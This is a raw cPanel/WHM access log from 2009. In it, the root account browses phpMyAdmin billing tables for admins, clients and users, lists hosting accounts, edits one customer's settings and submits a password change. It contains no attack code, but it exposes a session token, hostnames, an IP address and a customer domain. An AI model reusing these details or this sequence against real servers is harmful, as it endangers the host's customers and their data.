0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:31 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=left&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:32 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:34 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_sql.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_empty.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_deltbl.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tipp.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_select.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:35 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_browse.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:36 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_select.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:37 -0000] "GET /3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:40 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:41 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_primary.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:41 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_unique.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:41 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_index.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:42 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_primary.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:42 -0000] "GET /3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tbladmins&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:42 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_unique.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:42 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_index.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:43 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_ftext.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:43 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_unique.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:43 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_primary.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:43 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_index.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tbladmins" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:26:46 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tbladmins&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:16 -0000] "GET /3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tblclients HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:19 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tblclients" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:22 -0000] "GET /3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tblclients&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e&table=tblclients" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:25 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tblclients&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:27 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/error.ico HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:31 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/bd_ftext.png HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tblclients&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:37 -0000] "GET /xml-api/loadavg? HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:43 -0000] "GET /3rdparty/phpMyAdmin/themes/original/img/b_tblanalyse.png? HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_billing&table=tblclients&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:46 -0000] "GET /3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:47 -0000] "GET /3rdparty/phpMyAdmin/db_structure.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=&lang=en-utf-8&collation_connection=utf8_unicode_ci HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/index.php?db=webhostl_billing&token=8ca1ba8833931bc463e18a0da900681e" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:48 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=left&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:51 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/db_structure.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:54 -0000] "GET /3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e&table=whl_users HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/navigation.php?server=1&token=8ca1ba8833931bc463e18a0da900681e&db=webhostl_hosting&table=tblclients&lang=en-utf-8&collation_connection=utf8_unicode_ci" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:27:58 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e&table=whl_users" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:28:02 -0000] "GET /3rdparty/phpMyAdmin/sql.php?db=webhostl_hosting&table=whl_users&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/tbl_structure.php?db=webhostl_hosting&token=8ca1ba8833931bc463e18a0da900681e&table=whl_users" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:28:05 -0000] "GET /3rdparty/phpMyAdmin/phpmyadmin.css.php?token=8ca1ba8833931bc463e18a0da900681e&js_frame=right&nocache=3657783124 HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/3rdparty/phpMyAdmin/sql.php?db=webhostl_hosting&table=whl_users&token=8ca1ba8833931bc463e18a0da900681e&goto=tbl_structure.php&back=tbl_structure.php&pos=0" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:28:39 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:28:50 -0000] "GET /scripts/modwheel HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:29:20 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:30:01 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:30:08 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:30:24 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:30:43 -0000] "GET /scripts/edituser?domain=crownvipservices.com&user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts4/listaccts" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:30:46 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:30:52 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:31:25 -0000] "GET /scripts/editsets HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:31:28 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:31:48 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:31:51 -0000] "POST /scripts/saveedits HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/editsets" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:01 -0000] "GET /scripts4/listaccts HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:10 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:11 -0000] "GET /scripts/passwdlist HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/command" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:12 -0000] "GET /cPanel_magic_revision_1200442320/passbar/passbar.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:12 -0000] "GET /cPanel_magic_revision_1231994908/passbar/password_strength_optimized.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:13 -0000] "GET /cPanel_magic_revision_1231994899/yui/autocomplete/assets/skins/sam/autocomplete.css HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:14 -0000] "GET /cPanel_magic_revision_1186549334/js/pkg_hover.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:14 -0000] "GET /cPanel_magic_revision_1231994883/yui/datasource/datasource.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:15 -0000] "GET /cPanel_magic_revision_1231994899/yui/autocomplete/autocomplete.js HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:18 -0000] "GET /xml-api/accountsummary?user=crownvip HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:26 -0000] "GET /cPanel_magic_revision_1159323796/yui/container/assets/close12_1.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/cPanel_magic_revision_1231994907/themes/x/style_optimized.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:29 -0000] "GET /yui/treeview/assets/loading.gif HTTP/1.1" 200 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:31 -0000] "GET /scripts/display_package_info?pkg=Basic HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:32 -0000] "POST /scripts/passwd HTTP/1.1" 0 "https://srv01.webhostline.com:2087/scripts/passwdlist" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" +188.54.114.181 - root [06/08/2009:13:32:52 -0000] "GET /xml-api/loadavg HTTP/1.1" 200 0 